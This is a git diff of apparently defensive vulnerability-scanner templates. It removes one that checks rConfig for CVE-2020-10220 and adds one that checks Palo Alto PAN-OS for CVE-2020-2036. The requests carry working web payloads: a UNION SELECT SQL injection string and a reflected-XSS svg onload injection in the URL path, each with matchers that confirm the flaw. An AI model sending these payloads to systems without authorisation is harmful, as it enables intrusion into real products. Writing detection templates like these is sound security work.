diff --git a/cves/2020/CVE-2020-10220.yaml b/cves/2020/CVE-2020-10220.yaml
deleted file mode 100644
index 3548e11eda..0000000000
--- a/cves/2020/CVE-2020-10220.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2020-10220
-info:
-  name: rConfig SQLi
-  author: madrobot
-  severity: high
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
-  tags: SQLI
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--"
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "[project-discovery]"
-        part: body
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
new file mode 100644
index 0000000000..0749aebbe9
--- /dev/null
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-2036
+info:
+  name: Palo Alto Networks Reflected Cross Site Scripting
+  author: madrobot
+  severity: medium
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2036
+  reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+  tags: XSS
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/unauth/php/change_password.php/"><svg/onload=alert(1)>"
+      - "{{BaseURL}}/php/change_password.php/"><svg/onload=alert(1)>"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body